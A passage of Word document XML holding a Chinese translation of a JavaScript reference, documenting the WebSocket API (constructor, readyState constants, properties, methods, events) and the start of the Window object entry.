        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>表示一个支持</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>协</w:t>
      </w:r>
      <w:r>
        <w:t>议的到某个服务器的长生命周期的、双向的、类套接字的网络连接。这个网络连接模型和</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>的请求</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>响应模型有着根本的不同。可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数创建一个新的连接，使用</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>方法发送文本消息到服务器，同时为消息事件注册处理程序以便接收来自服务器的消息。更多细节可参考</w:t>
      </w:r>
      <w:r>
        <w:t>22.9</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>是新的</w:t>
      </w:r>
      <w:r>
        <w:t>Web API</w:t>
      </w:r>
      <w:r>
        <w:t>，在写作本书的时候，还没有被所有浏览器支持。</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WebSocket(string url,[string[]protocols])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>WebSocket()</w:t>
      </w:r>
      <w:r>
        <w:t>构造</w:t>
      </w:r>
      <w:r>
        <w:t>函数创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>对象，并开始（异步地）建立一个到</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>服务器的连接。</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>参数指定要连接的服务器，必须为一个使用</w:t>
      </w:r>
      <w:r>
        <w:t>ws://</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>wss://URL</w:t>
      </w:r>
      <w:r>
        <w:t>模式的绝对</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>protocols</w:t>
      </w:r>
      <w:r>
        <w:t>参数是一个由子协议名组成的数组。如果指定这个参数，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>则客户端将告诉服务器端可以</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>交谈</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的通信协议或协议版本。服务器必须从中选一个并通知客户端，这一切都是连接过程的一部分。</w:t>
      </w:r>
      <w:r>
        <w:t>protocols</w:t>
      </w:r>
      <w:r>
        <w:t>也可以以一个字符串的形式而不是数组的形式定义：这种情况下，它当做一个长度为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>的数组处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>常量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面的常量为</w:t>
      </w:r>
      <w:r>
        <w:t>ready</w:t>
      </w:r>
      <w:r>
        <w:t>State</w:t>
      </w:r>
      <w:r>
        <w:t>属性可能的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short CONNECTING=0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>连接进程正在进行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short OPEN=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>已连接到服务器，可以发送和接收消息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short CLOSING=2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>连接正在关闭。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short CLOSED=3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>连接已关闭。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>readonly unsigned long bufferedAmount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>刚刚传给</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s en </w:t>
      </w:r>
      <w:r>
        <w:t>d()</w:t>
      </w:r>
      <w:r>
        <w:t>方法但还没有真正发送的文本的字符数。如果要发送大量的数据，可以使用这个属性来避免传送消息的速度比它们可发送的速度快。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string protocol</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果给</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数传入一个子协议数组，则服务器选择的那个协议将保存在这个属性中。注意，当第一次创建</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>时，连接还没有建立，服务器的选择也还未知，所以这个属性开始时为一个空字符串。如果向构造函数传入若干协议，则当</w:t>
      </w:r>
      <w:r>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:t>事件被触发时，这个属性将改变为服务器选择的子协议。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">readonly unsigned </w:t>
      </w:r>
      <w:r>
        <w:t>short readyState</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>连接的当前状态。这个属性的值为上面列出的常量之一。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string url</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性保存传入到</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数中的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</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lastRenderedPageBreak/>
        <w:t>void close()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果当前连接不处在已关闭或正在关闭的状态，则这个方法将开始关闭它，并将</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:t>CLOSING</w:t>
      </w:r>
      <w:r>
        <w:t>。即便在调用了</w:t>
      </w:r>
      <w:r>
        <w:t>close()</w:t>
      </w:r>
      <w:r>
        <w:t>方法之后，仍然可能继续触发消息事件，直到</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>改变为</w:t>
      </w:r>
      <w:r>
        <w:t>CLOSED</w:t>
      </w:r>
      <w:r>
        <w:t>并且触发</w:t>
      </w:r>
      <w:r>
        <w:t>close</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void send(string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> data)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法将指定的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>发送到当前</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>连接的另一端的服务器。如果在触发</w:t>
      </w:r>
      <w:r>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:t>事件之前，即</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>仍然为</w:t>
      </w:r>
      <w:r>
        <w:t>CONNECTING</w:t>
      </w:r>
      <w:r>
        <w:t>时调用这个方法将抛出一个异常。</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>协议支持二进制数据，但在写作本书的时候，</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket API</w:t>
      </w:r>
      <w:r>
        <w:t>还只允许发送和接收字符串。</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网络通信本来是异步的，类似于</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket API</w:t>
      </w:r>
      <w:r>
        <w:t>是基于事件的。</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个事件处理程序注册属性，同时也实现了</w:t>
      </w:r>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
      <w:r>
        <w:t>，所以也可</w:t>
      </w:r>
      <w:r>
        <w:t>以使用</w:t>
      </w:r>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
      <w:r>
        <w:t>方法来注册事件处理程序。下面描述的事件都在</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发，它们都不会冒泡，也都没有可以取消的默认行为。不过需要注意，它们各自有着不同的关联事件对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>onclose</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>连接关闭时将触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>close</w:t>
      </w:r>
      <w:r>
        <w:t>事件（同时</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>将改变为</w:t>
      </w:r>
      <w:r>
        <w:t>CLOSED</w:t>
      </w:r>
      <w:r>
        <w:t>）。关联的事件对象为</w:t>
      </w:r>
      <w:r>
        <w:t>CloseEvent</w:t>
      </w:r>
      <w:r>
        <w:t>，指明当前连接是否干净地关闭了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当发生网络或</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>协议错误时将触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>事件。关联的事件对象为一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onmes</w:t>
      </w:r>
      <w:r>
        <w:t>sage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当服务器通过</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>发送数据时，这个</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>将触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>事件，伴随着一个关联的</w:t>
      </w:r>
      <w:r>
        <w:t>MessageEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象，该对象的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性指代接收到的消息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onopen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在与指定</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>之间的连接建立起来之前，</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数就返回了。当连接握手完成，</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>已准备好发送和接收数据时，将触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:t>事件。关联的事件对象为一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="884" w:name="Window"/>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:bookmarkEnd w:id="884"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>浏览器窗口、标签或框架页面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示一个浏览器窗口、标签</w:t>
      </w:r>
      <w:r>
        <w:t>或者框架页面。它的详细文档见第</w:t>
      </w:r>
      <w:r>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:t>章。在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>全局对象</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，所有表达式都是在当前</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的上下文中计算的。这就是说，引用当前</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>不需要特殊的语法，可以将</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性像全局变量一样使用。例如，可以将</w:t>
      </w:r>
      <w:r>
        <w:t>window.document</w:t>
      </w:r>
      <w:r>
        <w:t>写成</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>。类似地，可以像函数一样使用当前</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的方法，例如将</w:t>
      </w:r>
      <w:r>
        <w:t>window.alert()</w:t>
      </w:r>
      <w:r>
        <w:t>写成</w:t>
      </w:r>
      <w:r>
        <w:t>alert()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个对象的一些属性及方法的确以某种方式查询或操作浏览器窗口，而另外那些列在这儿是因为它是全</w:t>
      </w:r>
      <w:r>
        <w:t>局对象。除了这儿列出的属性和方法，</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象也实现了核心</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>定义的所有全局属性和函数。更多细节参见本书第三部分的</w:t>
      </w:r>
      <w:r>
        <w:t>Global</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器会在</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>上触发很多种事件。这意味着</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义了相当多的事件处理程序，同时，</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象也实现由</w:t>
      </w:r>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
      <w:r>
        <w:t>定义的各个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:t>属性都指代当前窗口对象本身。可以使用这两个属性来显式引用当前窗口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>可以包含别的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象，通常以＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签的形式。每个</w:t>
      </w:r>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>indow</w:t>
      </w:r>
      <w:r>
        <w:t>都是由嵌套的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象组成的一个类数组对象。不过，一般不采用直接检索一个</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的方法，而是使用它的自引用的</w:t>
      </w:r>
      <w:r>
        <w:t>frames</w:t>
      </w:r>
      <w:r>
        <w:t>属性，把这个属性当做对应的类数组对象。</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>parent</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>属性则指代当前窗口的直接容器窗口以及顶层祖先窗口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>Window.open()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来创建新的顶级浏览器窗口。调用这个方法时，可以将</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值保存在一个变量里，之后可通过这个变量来引用这个新窗口。新窗口的</w:t>
      </w:r>
      <w:r>
        <w:t>opener</w:t>
      </w:r>
      <w:r>
        <w:t>属性则指回打开它的那个窗口。</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除了这儿列出的属性，显示在窗口中的文档内容也会生成新的属性。如同</w:t>
      </w:r>
      <w:r>
        <w:t>14.7</w:t>
      </w:r>
      <w:r>
        <w:t>节解释过的，可以将文档中的元素的</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性值作为当前</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>的属性来引用这个元素（并且由于</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>是全局对象，因此它的属性也将是全局变量）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly ApplicationCache applicationCache</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指代</w:t>
      </w:r>
      <w:r>
        <w:t>ApplicationCache</w:t>
      </w:r>
      <w:r>
        <w:t>对象。已缓存的或离线的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用可以使用这个对象来管理它们的缓存更新。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>readonly any dialogArguments</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
